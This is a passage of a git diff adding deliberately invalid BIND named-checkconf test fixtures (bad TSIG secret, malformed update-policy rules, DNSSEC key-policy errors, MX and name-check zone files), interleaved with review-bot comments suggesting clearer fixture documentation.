+ primaries { 1.2.3.4; };
+ transfer-source 10.53.0.1 port 5300;
+};
diff --git a/bin/tests/system/checkconf/bad-tsig.conf b/bin/tests/system/checkconf/bad-tsig.conf
new file mode 100644
index 0000000..4af25b0
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-tsig.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/* Bad secret */
+key "badtsig" {
+ algorithm hmac-md5;
+ secret "jEdD+BPKg==";
+};
+
diff --git a/bin/tests/system/checkconf/bad-unpaired-keys.conf b/bin/tests/system/checkconf/bad-unpaired-keys.conf
new file mode 100644
index 0000000..63b6dc2
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-unpaired-keys.conf
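Review bot: In bad-tsig.conf the comment `/* Bad secret */` does not say what is wrong with the secret, and the key also uses `hmac-md5`, so the fixture has two candidate reasons for rejection. `jEdD+BPKg==` is 11 characters long, which is not a valid base64 length, and that appears to be the intended defect. If named-checkconf ever starts refusing hmac-md5 keys, this test would keep passing without exercising secret parsing at all. I would change the algorithm line to `algorithm hmac-sha256;` and reword the comment to `/* Bad secret: not valid base64 (length is not a multiple of 4) */`.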
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy unpaired-keys {
+ keys {
+ /* zsk without ksk */
+ zsk lifetime 30d algorithm 13;
+ /* ksk without zsk */
+ ksk lifetime 30d algorithm 7;
+ };
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ dnssec-policy unpaired-keys;
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy1.conf b/bin/tests/system/checkconf/bad-update-policy1.conf
new file mode 100644
index 0000000..6eedd9d
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy1.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * self TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy10.conf b/bin/tests/system/checkconf/bad-update-policy10.conf
new file mode 100644
index 0000000..29ed061
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy10.conf
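Review bot: bad-update-policy1.conf gives no hint of which check it is meant to trip, and `grant * self TXT;` looks well-formed at a glance. The rule seems to omit the name field, so `TXT` would be read in the name position; that is inferred from the rule layout, not from anything stated in the commit. A header comment such as `/* name field omitted: "TXT" is taken as the name */` would make the expected failure reviewable, and bad-update-policy2.conf through bad-update-policy15.conf differ only in the rule type and need the same line. Since update-policy rules decide who may change zone data, each fixture should state the exact rejection it covers, so a later parser change cannot quietly turn one of them into an accepted rule without the test author noticing.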
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * krb5-selfsub TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy11.conf b/bin/tests/system/checkconf/bad-update-policy11.conf
new file mode 100644
index 0000000..8f9e873
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy11.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * ms-selfsub TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy12.conf b/bin/tests/system/checkconf/bad-update-policy12.conf
new file mode 100644
index 0000000..1d42cdc
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy12.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * external TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy13.conf b/bin/tests/system/checkconf/bad-update-policy13.conf
new file mode 100644
index 0000000..38973f6
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy13.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant a-key-name name TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy14.conf b/bin/tests/system/checkconf/bad-update-policy14.conf
new file mode 100644
index 0000000..2cd0ef5
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy14.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant a-key-name subdomain TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy15.conf b/bin/tests/system/checkconf/bad-update-policy15.conf
new file mode 100644
index 0000000..a2a354a
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy15.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant a-key-name wildcard TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy2.conf b/bin/tests/system/checkconf/bad-update-policy2.conf
new file mode 100644
index 0000000..c83303f
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy2.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * selfsub TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy3.conf b/bin/tests/system/checkconf/bad-update-policy3.conf
new file mode 100644
index 0000000..4856adb
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy3.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * selfwild TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy4.conf b/bin/tests/system/checkconf/bad-update-policy4.conf
new file mode 100644
index 0000000..4bf1f5c
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy4.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * ms-self TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy5.conf b/bin/tests/system/checkconf/bad-update-policy5.conf
new file mode 100644
index 0000000..a1853f8
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy5.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * krb5-self TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy6.conf b/bin/tests/system/checkconf/bad-update-policy6.conf
new file mode 100644
index 0000000..b1ef09c
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy6.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * ms-subdomain TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy7.conf b/bin/tests/system/checkconf/bad-update-policy7.conf
new file mode 100644
index 0000000..1469b94
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy7.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * krb5-subdomain TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy8.conf b/bin/tests/system/checkconf/bad-update-policy8.conf
new file mode 100644
index 0000000..9e263ee
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy8.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * tcp-self TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-update-policy9.conf b/bin/tests/system/checkconf/bad-update-policy9.conf
new file mode 100644
index 0000000..23fcb66
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-update-policy9.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+ update-policy {
+ grant * 6to4-self TXT;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-validation-auto-key.conf b/bin/tests/system/checkconf/bad-validation-auto-key.conf
new file mode 100644
index 0000000..bd6f547
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-validation-auto-key.conf
@@ -0,0 +1,26 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnssec-validation auto;
+};
+
+trust-anchors {
+ . static-key 257 3 8 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbod
+ y0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQ
+ YfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX
+ 2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuw
+ E60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/
+ Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn
+ 6zqCkwuMmrU=";
+};
diff --git a/bin/tests/system/checkconf/bad-view-also-notify.conf b/bin/tests/system/checkconf/bad-view-also-notify.conf
new file mode 100644
index 0000000..6dd9a4c
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-view-also-notify.conf
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view example {
+ also-notify { missing; };
+ zone "example.net" {
+ type slave;
+ masters { 192.168.1.1; };
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-zsk-without-ksk.conf b/bin/tests/system/checkconf/bad-zsk-without-ksk.conf
new file mode 100644
index 0000000..31b031c
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-zsk-without-ksk.conf
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy zsk-without-ksk {
+ keys {
+ zsk lifetime 30d algorithm 13;
+ };
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ dnssec-policy zsk-without-ksk;
+};
diff --git a/bin/tests/system/checkconf/check-dup-records-fail.conf b/bin/tests/system/checkconf/check-dup-records-fail.conf
new file mode 100644
index 0000000..a655681
--- /dev/null
+++ b/bin/tests/system/checkconf/check-dup-records-fail.conf
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ check-integrity yes; // default is yes
+};
+
+zone "check-dup-records" {
+ type master;
+ file "check-dup-records.db";
+ check-dup-records fail;
+};
+
diff --git a/bin/tests/system/checkconf/check-dup-records.db b/bin/tests/system/checkconf/check-dup-records.db
new file mode 100644
index 0000000..558686c
--- /dev/null
+++ b/bin/tests/system/checkconf/check-dup-records.db
@@ -0,0 +1,33 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600 ; 10 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ MX 10 mail
+
+mail A 10.0.0.1
+ns2 A 10.53.0.2
+
+; following records are not de-duplicated
+; and will be matched by check-dup-records
+duplicate HIP ( 2 200100107B1A74DF365639CC39F1D578
+ AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D
+ rvs.example.com. )
+duplicate HIP ( 2 200100107B1A74DF365639CC39F1D578
+ AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D
+ RVS.example.com. )
diff --git a/bin/tests/system/checkconf/check-missing-zone.conf b/bin/tests/system/checkconf/check-missing-zone.conf
new file mode 100644
index 0000000..e33ad54
--- /dev/null
+++ b/bin/tests/system/checkconf/check-missing-zone.conf
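Review bot: The comment above the two `duplicate HIP` records in check-dup-records.db does not say what makes them duplicates: as written they differ only in the case of the rendezvous server name, `rvs.example.com.` versus `RVS.example.com.`. That difference is easy to normalise by accident in a later cleanup, which would change what the fixture exercises. I would extend the existing comment with `; the two records differ only in the case of the rendezvous server name`.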
@@ -0,0 +1,26 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view missing {
+ zone missing.example {
+ type master;
+ file "missing.example.db";
+ };
+};
+
+view good {
+ zone shared.example {
+ type master;
+ file "shared.example.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/check-mixed-keys.conf b/bin/tests/system/checkconf/check-mixed-keys.conf
new file mode 100644
index 0000000..1dd018d
--- /dev/null
+++ b/bin/tests/system/checkconf/check-mixed-keys.conf
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ # This key (19036) is to be phased out starting in 2017. It will
+ # remain in the root zone for some time after its successor key
+ # has been added. It will remain this file until it is removed from
+ # the root zone.
+ . static-key 257 3 8 "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF
+ FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX
+ bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD
+ X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz
+ W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS
+ Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq
+ QxA+Uk1ihz0=";
+};
+
+managed-keys {
+ # This key (20326) was published in the root zone in 2017.
+ # Servers which were already using the old key (19036) should
+ # roll seamlessly to this new one via RFC 5011 rollover. Servers
+ # being set up for the first time can use the contents of this
+ # file as initializing keys; thereafter, the keys in the
+ # managed key database will be trusted and maintained
+ # automatically.
+ . initial-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3
+ +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv
+ ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF
+ 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e
+ oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd
+ RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN
+ R1AkUTV74bU=";
+};
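Review bot: The comment over the first key in check-mixed-keys.conf reads `It will remain this file until it is removed from`, which is missing a word; `It will remain in this file until it is removed from` is what is meant. The same sentence is repeated in check-root-ksk-2010.conf and check-root-ksk-both.conf. The comments also describe the root key rollover rather than what this fixture combines, so a line such as `# static-key in trust-anchors plus initial-key in managed-keys, both for the root name` above the first block would tell a reader what the two blocks are here to exercise.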
diff --git a/bin/tests/system/checkconf/check-mx-cname-fail.conf b/bin/tests/system/checkconf/check-mx-cname-fail.conf
new file mode 100644
index 0000000..611fb2c
--- /dev/null
+++ b/bin/tests/system/checkconf/check-mx-cname-fail.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ check-integrity yes; // default is yes
+};
+
+zone "check-mx-cname" {
+ type master;
+ file "check-mx-cname.db";
+ check-mx-cname fail;
+};
diff --git a/bin/tests/system/checkconf/check-mx-cname.db b/bin/tests/system/checkconf/check-mx-cname.db
new file mode 100644
index 0000000..dc30f08
--- /dev/null
+++ b/bin/tests/system/checkconf/check-mx-cname.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600 ; 10 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ MX 10 mail
+
+; MX points to a CNAME which is detected by check-mx-cname
+mail CNAME ns2
+
+ns2 A 10.53.0.2
diff --git a/bin/tests/system/checkconf/check-mx-fail.conf b/bin/tests/system/checkconf/check-mx-fail.conf
new file mode 100644
index 0000000..408b1b4
--- /dev/null
+++ b/bin/tests/system/checkconf/check-mx-fail.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ check-integrity yes; // default is yes
+};
+
+zone "check-mx" {
+ type master;
+ file "check-mx.db";
+ check-mx fail;
+};
diff --git a/bin/tests/system/checkconf/check-mx.db b/bin/tests/system/checkconf/check-mx.db
new file mode 100644
index 0000000..dced644
--- /dev/null
+++ b/bin/tests/system/checkconf/check-mx.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600 ; 10 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+; MX appears to be an address and will be detected by check-mx
+ MX 10 10.0.0.1
+
+ns2 A 10.53.0.2
diff --git a/bin/tests/system/checkconf/check-names-fail.conf b/bin/tests/system/checkconf/check-names-fail.conf
new file mode 100644
index 0000000..8137747
--- /dev/null
+++ b/bin/tests/system/checkconf/check-names-fail.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ check-integrity yes; // default is yes
+};
+
+zone "check-names" {
+ type master;
+ file "check-names.db";
+ check-names fail;
+};
diff --git a/bin/tests/system/checkconf/check-names.db b/bin/tests/system/checkconf/check-names.db
new file mode 100644
index 0000000..0274ec9
--- /dev/null
+++ b/bin/tests/system/checkconf/check-names.db
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600 ; 10 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ MX 10 mail
+
+mail A 10.0.0.1
+ns2 A 10.53.0.2
+
+; the RDATA of this record contains a name that may be considered
+; invalid and will be detected by check-names configuration.
+check-names SRV 1 2 3 _underscore
diff --git a/bin/tests/system/checkconf/check-root-ksk-2010.conf b/bin/tests/system/checkconf/check-root-ksk-2010.conf
